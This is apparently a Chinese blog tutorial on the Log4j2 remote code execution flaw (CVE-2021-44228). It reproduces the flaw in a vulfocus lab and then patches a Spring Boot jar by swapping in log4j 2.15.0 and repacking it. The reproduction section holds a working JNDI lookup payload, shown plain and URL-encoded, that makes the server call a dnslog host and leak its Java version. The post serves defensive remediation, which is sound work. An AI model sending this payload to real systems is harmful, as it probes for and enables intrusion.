ApacheLog4j2.xRCE漏洞修复步骤(CVE-2021-44228)

ApacheLog4j2.xRCE漏洞修复步骤(CVE-2021-44228)

@Time : 2022/8/24 13:41
@Author : 852782749@qq.com

开始编辑~

文章共分为漏洞复现、漏洞修复

漏洞复现

部署log4j2环境,复现漏洞
这里使用vulfocus的log4j2 rce的docker环境中用到的环境包
java -jar c:\Apache_Log4j2\log4j2.jar --server.port=8081

可以自行下载或匹配自己对应业务系统的log4j*.jar包

启动后访问目标地址
在这里插入图片描述

打开dnslog.cn,开始监听
在这里插入图片描述

构造payload

构造payload ${jndi:ldap://${sys:java.version}.d82hcy.dnslog.cn};

将payload 进行url编码 %24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Ajava.version%7D.d82hcy.dnslog.cn%7D

攻击复现

使用浏览器发起访问host+prot/hello?payload=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Ajava.version%7D.d82hcy.dnslog.cn%7D

启动引擎日志记录了对dnslog发起的访问
在这里插入图片描述

切换到dnslog页面进行查看,部分需要单击Refresh Record获取下请求信息

如果能够检测到与下面类似的信息,说明复现成功。
在这里插入图片描述

漏洞修复

下载不受影响的log4j版本https://archive.apache.org/dist/logging/log4j/2.15.0/apache-log4j-2.15.0-bin.zip
jar命令
Soring boot 项目jar包解压之后 修改文件之后 在不依靠开发工具的情况下重新压缩jar包 打包命令如下:
jar -cvf0M log4jup.jar BOOT-INF/ META-INF/ org/
压缩
jar -cvf xxx.jar
解压
jar -xvf xxx.jar
更新
jar -uvf xxx.jar BOOT-INF/classes/application-dev.yml
列出jar包内容
jar -tvf xxx.jar
使用jar解压命令,将log4.jar解压

在这里插入图片描述

在这里插入图片描述

漏洞修复步骤

查询引用了哪些log4j*.jar,在路径\BOOT-INF\lib\下找到两个log4j的包
在这里插入图片描述

使用新版的jar包将其替换
在这里插入图片描述

替换成新版本之后,找到引用的pom.xml文件,在路径\META-INF\maven\com.example\log4j2_rce\下,
在这里插入图片描述

将log4j的version修改为新的版本号,如这里是2.15.0
在这里插入图片描述

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.15.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.15.0</version>
</dependency>

使用jar -cvf0M log4jup.jar BOOT-INF/ META-INF/ org/命令重新压缩成新的jar包,如log4jup.jar
在这里插入图片描述

在这里插入图片描述

此时已完成修复,可以再次重复漏洞复现步骤进行验证,dnslog已经获取不到信息
在这里插入图片描述

思考

乾坤未定,你我皆是黑马

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值